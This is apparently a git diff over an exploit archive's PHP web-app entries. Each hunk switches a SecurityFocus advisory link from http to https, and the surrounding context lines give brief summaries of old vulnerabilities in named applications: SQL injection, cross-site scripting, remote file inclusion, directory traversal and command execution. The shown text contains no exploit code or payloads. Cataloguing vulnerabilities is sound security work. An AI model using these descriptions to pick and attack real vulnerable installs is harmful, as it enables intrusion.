-1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9053/info +source: https://www.securityfocus.com/bid/9053/info It has been reported that phpWebFileManager may be prone to a directory traversal vulnerability that may allow an attacker to gain access to sensitive information. The issue presents itself due to insufficient sanitization of user-supplied input. An attacker may traverse outside the server root directory by using '../' character sequences. diff --git a/exploits/php/webapps/23384.txt b/exploits/php/webapps/23384.txt index 651785913..0ff37d4c2 100644 --- a/exploits/php/webapps/23384.txt +++ b/exploits/php/webapps/23384.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9054/info +source: https://www.securityfocus.com/bid/9054/info It has been reported that Rolis Guestbook may be vulnerable to an input validation issue that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. diff --git a/exploits/php/webapps/23386.txt b/exploits/php/webapps/23386.txt index ead679659..52a829762 100644 --- a/exploits/php/webapps/23386.txt +++ b/exploits/php/webapps/23386.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9056/info +source: https://www.securityfocus.com/bid/9056/info It has been reported that Auto Directory Index is prone to a cross-site scripting vulnerability. The issue is reported to exist due insufficient sanitization of user-supplied data through the 'dir' parameter, which will then be included in a dynamically generated web page. The problem may allow a remote attacker to execute HTML or script code in the browser of a user following a malicious link created by an attacker. diff --git a/exploits/php/webapps/23403.pl b/exploits/php/webapps/23403.pl index e6f400ee3..cf923b6f4 100755 --- a/exploits/php/webapps/23403.pl +++ b/exploits/php/webapps/23403.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9113/info +source: https://www.securityfocus.com/bid/9113/info A problem has been identified in the handling of input by My_eGallery. Because of this, it may be possible for a remote user to gain unauthorized access to a system using the vulnerable software. diff --git a/exploits/php/webapps/23406.txt b/exploits/php/webapps/23406.txt index af9dc552c..cd05ed809 100644 --- a/exploits/php/webapps/23406.txt +++ b/exploits/php/webapps/23406.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9130/info +source: https://www.securityfocus.com/bid/9130/info An information disclosure weakness has been reported in CuteNews 1.3, that may expose sensitive server configuration data. The problem occurs due to CuteNews accepting a debug query that will result in the exposure of information returned from a call to the phpinfo() function. diff --git a/exploits/php/webapps/23416.txt b/exploits/php/webapps/23416.txt index e3dd73bde..9ba3f7eda 100644 --- a/exploits/php/webapps/23416.txt +++ b/exploits/php/webapps/23416.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9166/info +source: https://www.securityfocus.com/bid/9166/info Multiple vulnerabilities were reported in Xoops. These issues include SQL injection and input validation issues that will allow remote attackers to manipulate banners and local variables. Exploitation could compromise the software or have other consequences. diff --git a/exploits/php/webapps/23420.txt b/exploits/php/webapps/23420.txt index 2865cb67d..f0b7dcf3e 100644 --- a/exploits/php/webapps/23420.txt +++ b/exploits/php/webapps/23420.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9179/info +source: https://www.securityfocus.com/bid/9179/info Bitfolge Snif is prone to a cross-site scripting vulnerability. As a result, hostile HTML and script code may be embedded in a malicious link to a site hosting the vulnerable software. If such a link is visited by a victim user, the attacker-supplied code may render in their web browser in the context of the site. diff --git a/exploits/php/webapps/23428.html b/exploits/php/webapps/23428.html index a68b4be4c..f86d31256 100644 --- a/exploits/php/webapps/23428.html +++ b/exploits/php/webapps/23428.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9193/info +source: https://www.securityfocus.com/bid/9193/info It has been reported that Mambo Server may be prone to an unauthorized access vulnerability that may allow an attacker to modify a user and/or an administrator's information such as password, email, name etc, after supplying a legitimate user id. diff --git a/exploits/php/webapps/23429.txt b/exploits/php/webapps/23429.txt index 6b42cbacd..411c3bf9c 100644 --- a/exploits/php/webapps/23429.txt +++ b/exploits/php/webapps/23429.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9196/info +source: https://www.securityfocus.com/bid/9196/info It has bee reported that Mambo Open Source 4.0.14 Server is prone to SQL injection attacks. The problem is said to occur due to insufficient sanitization of data passed to specific index.php variables. As a result, an attacker may be capable of influencing the logic of specific queries or statements made by the underlying database. This could ultimately result in a number of attacks being carried out against the system. diff --git a/exploits/php/webapps/23430.txt b/exploits/php/webapps/23430.txt index 43f0a8eca..17348a534 100644 --- a/exploits/php/webapps/23430.txt +++ b/exploits/php/webapps/23430.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9197/info +source: https://www.securityfocus.com/bid/9197/info Mambo Open Source is prone to SQL injection attacks. This is due to an input validation error in 'pollBooth.php'. In particular, various user-supplied variables are used in an SQL query without proper sanitization of SQL syntax. As a result, a remote attacker could include malicious SQL syntax via URI parameters and influence database queries. diff --git a/exploits/php/webapps/23434.pl b/exploits/php/webapps/23434.pl index edf9fcba9..eb11d3938 100755 --- a/exploits/php/webapps/23434.pl +++ b/exploits/php/webapps/23434.pl @@ -1,5 +1,5 @@ #!/usr/bin/perl -#source: http://www.securityfocus.com/bid/9211/info +#source: https://www.securityfocus.com/bid/9211/info # #It has been reported that one of the scripts included with osCommerce fails to validate user-supplied input, rendering it vulnerable to a SQL injection attack. The script in question is used to verify account details during the new user registration process and has the filename "create_account_process.php". It may be possible for attackers to manipulate the query to corrupt data in the database or, possibly, gain access on the underlying host (through, for example, stored procedures or vulnerabilities in the database server). # diff --git a/exploits/php/webapps/23443.txt b/exploits/php/webapps/23443.txt index 1372b9c14..2ea5c9200 100644 --- a/exploits/php/webapps/23443.txt +++ b/exploits/php/webapps/23443.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9231/info +source: https://www.securityfocus.com/bid/9231/info Multiple vulnerabilities have been identified in the software that include information disclosure, path disclosure, SQL injection, and a plaintext password weakness. diff --git a/exploits/php/webapps/23445.txt b/exploits/php/webapps/23445.txt index 8ee3cce0e..0908fba45 100644 --- a/exploits/php/webapps/23445.txt +++ b/exploits/php/webapps/23445.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9238/info +source: https://www.securityfocus.com/bid/9238/info It has been reported that osCommerce may be prone to a cross-site scripting vulnerability that may allow an attacker to construct a malicious link containing HTML or script code that may be rendered in a user's browser. diff --git a/exploits/php/webapps/23453.txt b/exploits/php/webapps/23453.txt index e9ba79457..578e02093 100644 --- a/exploits/php/webapps/23453.txt +++ b/exploits/php/webapps/23453.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9268/info +source: https://www.securityfocus.com/bid/9268/info It has been reported that BES-CMS is vulnerable to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. The problem exists in the 'index.inc.php', 'Members/index.inc.php', 'Members/root/index.inc.php', 'Include/functions_folder.php', 'Include/functions_message.php', 'Include/Start.php' scripts of the software. diff --git a/exploits/php/webapps/23454.txt b/exploits/php/webapps/23454.txt index a96e494bf..5764b36a4 100644 --- a/exploits/php/webapps/23454.txt +++ b/exploits/php/webapps/23454.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9268/info +source: https://www.securityfocus.com/bid/9268/info It has been reported that BES-CMS is vulnerable to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. The problem exists in the 'index.inc.php', 'Members/index.inc.php', 'Members/root/index.inc.php', 'Include/functions_folder.php', 'Include/functions_message.php', 'Include/Start.php' scripts of the software. diff --git a/exploits/php/webapps/23455.txt b/exploits/php/webapps/23455.txt index 79ec28173..52c943ac5 100644 --- a/exploits/php/webapps/23455.txt +++ b/exploits/php/webapps/23455.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9268/info +source: https://www.securityfocus.com/bid/9268/info It has been reported that BES-CMS is vulnerable to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. The problem exists in the 'index.inc.php', 'Members/index.inc.php', 'Members/root/index.inc.php', 'Include/functions_folder.php', 'Include/functions_message.php', 'Include/Start.php' scripts of the software. diff --git a/exploits/php/webapps/23456.txt b/exploits/php/webapps/23456.txt index 1f2677581..572ff6f76 100644 --- a/exploits/php/webapps/23456.txt +++ b/exploits/php/webapps/23456.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9268/info +source: https://www.securityfocus.com/bid/9268/info It has been reported that BES-CMS is vulnerable to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. The problem exists in the 'index.inc.php', 'Members/index.inc.php', 'Members/root/index.inc.php', 'Include/functions_folder.php', 'Include/functions_message.php', 'Include/Start.php' scripts of the software. diff --git a/exploits/php/webapps/23457.txt b/exploits/php/webapps/23457.txt index d3bd2d105..44ccc0d83 100644 --- a/exploits/php/webapps/23457.txt +++ b/exploits/php/webapps/23457.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9268/info +source: https://www.securityfocus.com/bid/9268/info It has been reported that BES-CMS is vulnerable to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. The problem exists in the 'index.inc.php', 'Members/index.inc.php', 'Members/root/index.inc.php', 'Include/functions_folder.php', 'Include/functions_message.php', 'Include/Start.php' scripts of the software. diff --git a/exploits/php/webapps/23458.txt b/exploits/php/webapps/23458.txt index 357902290..a073c7e97 100644 --- a/exploits/php/webapps/23458.txt +++ b/exploits/php/webapps/23458.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9268/info +source: https://www.securityfocus.com/bid/9268/info It has been reported that BES-CMS is vulnerable to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. The problem exists in the 'index.inc.php', 'Members/index.inc.php', 'Members/root/index.inc.php', 'Include/functions_folder.php', 'Include/functions_message.php', 'Include/Start.php' scripts of the software. diff --git a/exploits/php/webapps/23459.txt b/exploits/php/webapps/23459.txt index c354f558a..7c3830672 100644 --- a/exploits/php/webapps/23459.txt +++ b/exploits/php/webapps/23459.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9269/info +source: https://www.securityfocus.com/bid/9269/info Xoops is prone to a cross-site scripting vulnerability in the 'myheader.php' script included in the mylinks module. A remote attacker could exploit this issue by embedding hostile HTML and script code in a malicious link to the vulnerable script. Exploitation could allow for theft of cookie-based authentication credentials or other attacks. diff --git a/exploits/php/webapps/23462.txt b/exploits/php/webapps/23462.txt index 6c89252d2..c35a44f74 100644 --- a/exploits/php/webapps/23462.txt +++ b/exploits/php/webapps/23462.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9275/info +source: https://www.securityfocus.com/bid/9275/info It has been reported that one of the scripts included with osCommerce fails to validate user-supplied input, rendering it vulnerable to a SQL injection attack. diff --git a/exploits/php/webapps/23463.txt b/exploits/php/webapps/23463.txt index 5c2c3668e..5d6b81b1c 100644 --- a/exploits/php/webapps/23463.txt +++ b/exploits/php/webapps/23463.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9277/info +source: https://www.securityfocus.com/bid/9277/info A vulnerability has been reported to exist in the software that may allow a remote user to launch cross-site scripting attacks. The problem is reported to exist due to improper sanitizing of user-supplied data in certain URI parameters passed to the default.php script. This vulnerability makes it possible for an attacker to construct a malicious link containing HTML or script code that may be rendered in a user's browser upon visiting that link. This attack would occur in the security context of the site. diff --git a/exploits/php/webapps/23473.txt b/exploits/php/webapps/23473.txt index dd3f445d7..b5052cadc 100644 --- a/exploits/php/webapps/23473.txt +++ b/exploits/php/webapps/23473.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9286/info +source: https://www.securityfocus.com/bid/9286/info my little forum is prone to a cross-site scripting vulnerability in the 'email.php' script. The source of the problem is that HTML and script code are not adequately sanitized from input supplied via the URI parameters. A remote attacker could exploit this issue by embedding hostile HTML and script code in a malicious link to the vulnerable script. diff --git a/exploits/php/webapps/23474.txt b/exploits/php/webapps/23474.txt index 42ba2c5a8..db6ef0353 100644 --- a/exploits/php/webapps/23474.txt +++ b/exploits/php/webapps/23474.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9289/info +source: https://www.securityfocus.com/bid/9289/info Webfroot Shoutbox is prone to a cross-site scripting vulnerability in the 'viewshoutbox.php' script. The source of the problem is that HTML and script code are not adequately sanitized from input supplied via URI parameters. This input will be included in dynamically generated web pages. A remote attacker could exploit this issue by embedding hostile HTML and script code in a malicious link to the vulnerable script. The attacker-supplied code will be interpreted in the context of the site hosting the vulnerable software. diff --git a/exploits/php/webapps/23475.txt b/exploits/php/webapps/23475.txt index 941c80492..7fbe93276 100644 --- a/exploits/php/webapps/23475.txt +++ b/exploits/php/webapps/23475.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9290/info +source: https://www.securityfocus.com/bid/9290/info phpBB is prone to a cross-site scripting vulnerability in the 'privmsg.php' script. The source of the problem is that HTML and script code are not adequately sanitized from input supplied via URI parameters. This input will be included in dynamically generated web pages. A remote attacker could exploit this issue by embedding hostile HTML and script code in a malicious link to the vulnerable script. The attacker-supplied code will be interpreted in the context of the site hosting the vulnerable software. diff --git a/exploits/php/webapps/23476.txt b/exploits/php/webapps/23476.txt index 293b3cfa8..a34f64909 100644 --- a/exploits/php/webapps/23476.txt +++ b/exploits/php/webapps/23476.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9292/info +source: https://www.securityfocus.com/bid/9292/info KnowledgeBuilder is prone to a remote file include vulnerability. An attacker could exploit this to cause hostile PHP scripts to be included and executed from a remote server. This would occur in the security context of the web server hosting the software. diff --git a/exploits/php/webapps/23477.txt b/exploits/php/webapps/23477.txt index 16a63d3f6..28f5e7ad3 100644 --- a/exploits/php/webapps/23477.txt +++ b/exploits/php/webapps/23477.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9293/info +source: https://www.securityfocus.com/bid/9293/info It has been reported that Psychoblogger may be prone to multiple cross-site scripting vulnerabilities that may allow a remote attacker to execute HTML or script code in a user's browser. The issues are reported to exist in the 'imageview.php', 'entryadmin.php', 'authoredit.php', 'blockedit.php', 'configadmin.php' and 'quoteedit.php' scripts. These vulnerabilities result from insufficient sanitization of user-supplied data passed via vulnerable parameters. diff --git a/exploits/php/webapps/23478.txt b/exploits/php/webapps/23478.txt index d30669c98..e787bdc27 100644 --- a/exploits/php/webapps/23478.txt +++ b/exploits/php/webapps/23478.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9293/info +source: https://www.securityfocus.com/bid/9293/info It has been reported that Psychoblogger may be prone to multiple cross-site scripting vulnerabilities that may allow a remote attacker to execute HTML or script code in a user's browser. The issues are reported to exist in the 'imageview.php', 'entryadmin.php', 'authoredit.php', 'blockedit.php', 'configadmin.php' and 'quoteedit.php' scripts. These vulnerabilities result from insufficient sanitization of user-supplied data passed via vulnerable parameters. diff --git a/exploits/php/webapps/23483.txt b/exploits/php/webapps/23483.txt index 36cb53f8a..9fccfa9e6 100644 --- a/exploits/php/webapps/23483.txt +++ b/exploits/php/webapps/23483.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9303/info +source: https://www.securityfocus.com/bid/9303/info OpenBB is prone to a cross-site scripting vulnerability in the 'board.php' script. The source of the problem is that HTML and script code are not adequately sanitized from input supplied via URI parameters. This input will be included in dynamically generated web pages. A remote attacker could exploit this issue by embedding hostile HTML and script code in a malicious link to the vulnerable script. diff --git a/exploits/php/webapps/23484.txt b/exploits/php/webapps/23484.txt index ebba3f211..048998c15 100644 --- a/exploits/php/webapps/23484.txt +++ b/exploits/php/webapps/23484.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9305/info +source: https://www.securityfocus.com/bid/9305/info A vulnerability has been reported to exist in the Survey module of PHP-Nuke that may allow a remote attacker to inject malicious SQL syntax into database queries. The source of this issue is insufficient sanitization of user-supplied input. diff --git a/exploits/php/webapps/23486.txt b/exploits/php/webapps/23486.txt index c697b9694..06cdd391e 100644 --- a/exploits/php/webapps/23486.txt +++ b/exploits/php/webapps/23486.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9308/info +source: https://www.securityfocus.com/bid/9308/info Private Message System is prone to a cross-site scripting vulnerability. This issue may be exploited by creating a malicious link to a site hosting the software with hostile HTML and script code embedded in URI parameters. If the link is followed, the attacker-supplied code may be rendered in the victim user's browser. diff --git a/exploits/php/webapps/23487.txt b/exploits/php/webapps/23487.txt index 45334d164..f885313fd 100644 --- a/exploits/php/webapps/23487.txt +++ b/exploits/php/webapps/23487.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9309/info +source: https://www.securityfocus.com/bid/9309/info It has been reported that php-ping may be prone to a remote command execution vulnerability that may allow remote attackers to execute commands on vulnerable systems. The problem exists due to insufficient sanitization of shell metacharacters via the 'count' parameter of php-ping.php script. diff --git a/exploits/php/webapps/23507.txt b/exploits/php/webapps/23507.txt index 5ac73a7c1..5cd776479 100644 --- a/exploits/php/webapps/23507.txt +++ b/exploits/php/webapps/23507.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9338/info +source: https://www.securityfocus.com/bid/9338/info EasyDynamicPages is prone to a remote file include vulnerability in a configuration script. This will permit a remote attack to include malicious PHP scripts from remote servers, which will then be executed by the web server hosting the vulnerable software. diff --git a/exploits/php/webapps/23513.txt b/exploits/php/webapps/23513.txt index cbdf7965a..4100bb77a 100644 --- a/exploits/php/webapps/23513.txt +++ b/exploits/php/webapps/23513.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9349/info +source: https://www.securityfocus.com/bid/9349/info A problem has been reported in the handling of user-supplied input by the Athena Web Registration scripts. Because of this, it may be possible for an attacker to gain unauthorized access to a vulnerable system. diff --git a/exploits/php/webapps/23517.txt b/exploits/php/webapps/23517.txt index c5356031c..1ec4f481f 100644 --- a/exploits/php/webapps/23517.txt +++ b/exploits/php/webapps/23517.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9357/info +source: https://www.securityfocus.com/bid/9357/info HotNews is prone to multiple file include vulnerabilities. This will permit remote attackers to cause malicious PHP scripts from attacker-controlled servers to be included and subsequently executed in the context of the web server hosting the vulnerable software. diff --git a/exploits/php/webapps/23518.txt b/exploits/php/webapps/23518.txt index 5b803ea02..a8fb4ae9e 100644 --- a/exploits/php/webapps/23518.txt +++ b/exploits/php/webapps/23518.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9357/info +source: https://www.securityfocus.com/bid/9357/info HotNews is prone to multiple file include vulnerabilities. This will permit remote attackers to cause malicious PHP scripts from attacker-controlled servers to be included and subsequently executed in the context of the web server hosting the vulnerable software. diff --git a/exploits/php/webapps/23519.txt b/exploits/php/webapps/23519.txt index b742d5176..d5a280c8b 100644 --- a/exploits/php/webapps/23519.txt +++ b/exploits/php/webapps/23519.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9359/info +source: https://www.securityfocus.com/bid/9359/info FreznoShop is prone to a cross-site scripting vulnerability. Remote attackers may create malicious links to the software that include hostile HTML and script code. If such a link was followed by a victim user, the attacker-supplied code would be rendered in the security context of the site hosting the software. diff --git a/exploits/php/webapps/23520.txt b/exploits/php/webapps/23520.txt index ad364e107..a024675cc 100644 --- a/exploits/php/webapps/23520.txt +++ b/exploits/php/webapps/23520.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9368/info +source: https://www.securityfocus.com/bid/9368/info PhpGedView is prone to multiple file include vulnerabilities. The source of the issue is that a number of scripts that ship with the software permit remote users to influence require() paths for various external files. This will permit remote attackers to cause malicious PHP scripts from attacker-controlled servers to be included and subsequently executed in the context of the web server hosting the vulnerable software. diff --git a/exploits/php/webapps/23525.txt b/exploits/php/webapps/23525.txt index 6f066a461..062a88659 100644 --- a/exploits/php/webapps/23525.txt +++ b/exploits/php/webapps/23525.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9369/info +source: https://www.securityfocus.com/bid/9369/info PhpGedView is prone to a cross-site scripting vulnerability. Remote attackers may create malicious links to this script that include hostile HTML and script code. If such a link was followed by a victim user, the attacker-supplied code would be rendered in the security context of the site hosting the software. diff --git a/exploits/php/webapps/23526.txt b/exploits/php/webapps/23526.txt index 9b4153bef..5fec9c7b5 100644 --- a/exploits/php/webapps/23526.txt +++ b/exploits/php/webapps/23526.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9371/info +source: https://www.securityfocus.com/bid/9371/info PhpGedView allows remote users to access information displayed by the phpinfo() function. This may disclose sensitive information about the environment the software runs in. diff --git a/exploits/php/webapps/23536.txt b/exploits/php/webapps/23536.txt index a3ae5755d..239bb10e9 100644 --- a/exploits/php/webapps/23536.txt +++ b/exploits/php/webapps/23536.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9395/info +source: https://www.securityfocus.com/bid/9395/info A problem in the handling of user-supplied input by Andy's PHP Projects Man Page Lookup script has been reported. Because of this, it is possible for an attacker to gain unauthorized access to sensitive information on a system. diff --git a/exploits/php/webapps/23537.txt b/exploits/php/webapps/23537.txt index 0f3ae8741..e5ac041d8 100644 --- a/exploits/php/webapps/23537.txt +++ b/exploits/php/webapps/23537.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9396/info +source: https://www.securityfocus.com/bid/9396/info A problem in handling of specific types of input passed to the module.php script in VisualShapers ezContents has been discovered. Because of this, an attacker may be able to gain unauthorized access to vulnerable systems. diff --git a/exploits/php/webapps/23546.txt b/exploits/php/webapps/23546.txt index 7fc99879d..a7ad1cd52 100644 --- a/exploits/php/webapps/23546.txt +++ b/exploits/php/webapps/23546.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9437/info +source: https://www.securityfocus.com/bid/9437/info Multiple vulnerabilities have been reported to exist in the software that may allow an attacker to carry out attacks against the database, disclose sensitive information, and execute HTML or script code in a user's browser. The issues include SQL injection, cross-site scripting, HTML injection, and information disclosure. diff --git a/exploits/php/webapps/23553.php b/exploits/php/webapps/23553.php index cf976fd71..f3628799d 100644 --- a/exploits/php/webapps/23553.php +++ b/exploits/php/webapps/23553.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9445/info +source: https://www.securityfocus.com/bid/9445/info It has been reported that Mambo Open Source may be prone to a remote file include vulnerability that may allow an attacker to include malicious external files containing arbitrary PHP code to be executed on a vulnerable system. The issue exists because remote users may reportedly influence the include path for external scripts by supplying their own value for the 'mosConfig_absolute_path' variable in the 'mod_mainmenu.php' script. diff --git a/exploits/php/webapps/23554.java b/exploits/php/webapps/23554.java index 5964e0604..22f97f707 100644 --- a/exploits/php/webapps/23554.java +++ b/exploits/php/webapps/23554.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9449/info +source: https://www.securityfocus.com/bid/9449/info A problem with YaBB SE could make it possible for a remote user launch SQL injection attacks. diff --git a/exploits/php/webapps/23558.txt b/exploits/php/webapps/23558.txt index aed69444e..2c5b06b93 100644 --- a/exploits/php/webapps/23558.txt +++ b/exploits/php/webapps/23558.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9458/info +source: https://www.securityfocus.com/bid/9458/info It has been reported that PHPix is vulnerable to a remote command execution vulnerability due to poor handling of externally supplied data such as shell metacharacters. This issue may allow unauthorized access to the affected system with the privileges of the web server hosting the vulnerable program. diff --git a/exploits/php/webapps/23599.txt b/exploits/php/webapps/23599.txt index 3b4336823..6a039891a 100644 --- a/exploits/php/webapps/23599.txt +++ b/exploits/php/webapps/23599.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9490/info +source: https://www.securityfocus.com/bid/9490/info It has been reported that Gallery is prone to a vulnerability that may allow a remote attacker to gain unauthorized access by overwriting various values for global variables. The issue occurs due to improper simulation of the behaviour of register_globals when the register_globals settings is disabled. It has been reported that register_globals functionality is simulated by extracting the values of the various $HTTP_ global variables into the global namespace. Due to improper sanitization of user-supplied data, an attacker may be able to overwrite the value of 'HTTP_POST_VARS' via the register_global simulation. Arbitrary PHP files may be included via the 'GALLERY_BASEDIR' parameter. diff --git a/exploits/php/webapps/23606.txt b/exploits/php/webapps/23606.txt index 001e75852..8205044e1 100644 --- a/exploits/php/webapps/23606.txt +++ b/exploits/php/webapps/23606.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9497/info +source: https://www.securityfocus.com/bid/9497/info It has been reported that Xoops may be prone to a cross-site scripting vulnerability that may allow a remote user to execute HTML or script code in a user's browser. HTML and script code may be parsed via the 'topic_id' and 'forum' URI parameters of 'newbb/viewtopic.php' script. diff --git a/exploits/php/webapps/23607.txt b/exploits/php/webapps/23607.txt index cc227b983..f52bc2185 100644 --- a/exploits/php/webapps/23607.txt +++ b/exploits/php/webapps/23607.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9499/info +source: https://www.securityfocus.com/bid/9499/info A flaw exists in the Kietu 'index.php' script that may permit remote attackers to include malicious remote files. Remote users may influence the include path for the 'config.php' configuration file, which may result in execution of arbitrary commands with the privileges of the webserver process. diff --git a/exploits/php/webapps/23616.txt b/exploits/php/webapps/23616.txt index 0e972a7c0..541aad6c3 100644 --- a/exploits/php/webapps/23616.txt +++ b/exploits/php/webapps/23616.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9529/info +source: https://www.securityfocus.com/bid/9529/info It has been reported that PhpGedView may be prone to a directory traversal vulnerability that may allow a remote attacker to access files outside the server root directory. The problem exists due to insufficient sanitization of user-supplied data via the 'gedcom_config' parameter of the 'editconfig_gedcom.php' script. diff --git a/exploits/php/webapps/23617.txt b/exploits/php/webapps/23617.txt index 9e546a2e8..322f87756 100644 --- a/exploits/php/webapps/23617.txt +++ b/exploits/php/webapps/23617.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9531/info +source: https://www.securityfocus.com/bid/9531/info It has been reported that PhpGedView may be prone to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. The problem reportedly exists because remote users may influence the 'PGV_BASE_DIRECTORY' variable in the [GED_File]_conf.php module, which specifies an include path. diff --git a/exploits/php/webapps/23618.txt b/exploits/php/webapps/23618.txt index bee8cc211..fb7966f87 100644 --- a/exploits/php/webapps/23618.txt +++ b/exploits/php/webapps/23618.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9535/info +source: https://www.securityfocus.com/bid/9535/info JBrowser has been reported to be vulnerable to directory traversal vulnerability that may allow a remote attacker to gain access to files readable by the web-server that reside outside of the server root directory. This issue is caused by insufficient sanitization of user specified directory paramemters issued to the 'browser.php' script. diff --git a/exploits/php/webapps/23619.txt b/exploits/php/webapps/23619.txt index 21d2f49e2..10098c3d7 100644 --- a/exploits/php/webapps/23619.txt +++ b/exploits/php/webapps/23619.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9536/info +source: https://www.securityfocus.com/bid/9536/info It has been reported that Les Commentaires may be prone to a file include vulnerability in various modules, that may allow an attacker to include malicious external files containing arbitrary PHP code to be executed on a vulnerable system. diff --git a/exploits/php/webapps/23620.txt b/exploits/php/webapps/23620.txt index 3f262850a..42b3f8910 100644 --- a/exploits/php/webapps/23620.txt +++ b/exploits/php/webapps/23620.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9536/info +source: https://www.securityfocus.com/bid/9536/info It has been reported that Les Commentaires may be prone to a file include vulnerability in various modules, that may allow an attacker to include malicious external files containing arbitrary PHP code to be executed on a vulnerable system. diff --git a/exploits/php/webapps/23621.txt b/exploits/php/webapps/23621.txt index b5cb29eab..a9c91df43 100644 --- a/exploits/php/webapps/23621.txt +++ b/exploits/php/webapps/23621.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9536/info +source: https://www.securityfocus.com/bid/9536/info It has been reported that Les Commentaires may be prone to a file include vulnerability in various modules, that may allow an attacker to include malicious external files containing arbitrary PHP code to be executed on a vulnerable system. diff --git a/exploits/php/webapps/23628.txt b/exploits/php/webapps/23628.txt index 04a0d0d03..1992befc4 100644 --- a/exploits/php/webapps/23628.txt +++ b/exploits/php/webapps/23628.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9537/info +source: https://www.securityfocus.com/bid/9537/info Due to a lack of access validation to the '_admin' directory, malevolent users may be able to execute arbitrary admin scripts. This may allow a malicious user to upload arbitrary files to the affected system and gain access to files outside of the web server root directory. There may also be other consequences associated with this vulnerability. diff --git a/exploits/php/webapps/23630.txt b/exploits/php/webapps/23630.txt index 499380bf4..71b95e353 100644 --- a/exploits/php/webapps/23630.txt +++ b/exploits/php/webapps/23630.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9540/info +source: https://www.securityfocus.com/bid/9540/info Aprox Portal is prone to a vulnerability that may permit remote attackers to gain access to files that are readable by the hosting web server. These files may exist outside of the server root. diff --git a/exploits/php/webapps/23631.txt b/exploits/php/webapps/23631.txt index 5de3f980f..1fad96b46 100644 --- a/exploits/php/webapps/23631.txt +++ b/exploits/php/webapps/23631.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9544/info +source: https://www.securityfocus.com/bid/9544/info Multiple SQL injection vulnerabilities have been reported in various modules included in PHP-Nuke versions 6.9 and earlier. These issues could permit remote attackers to compromise PHP-Nuke administrative accounts. Other attacks may also be possible, such as gaining access to sensitive information. diff --git a/exploits/php/webapps/23636.txt b/exploits/php/webapps/23636.txt index 0c4fa990a..c4f1c8c5e 100644 --- a/exploits/php/webapps/23636.txt +++ b/exploits/php/webapps/23636.txt @@ -1,4 +1,4 @@ -source: 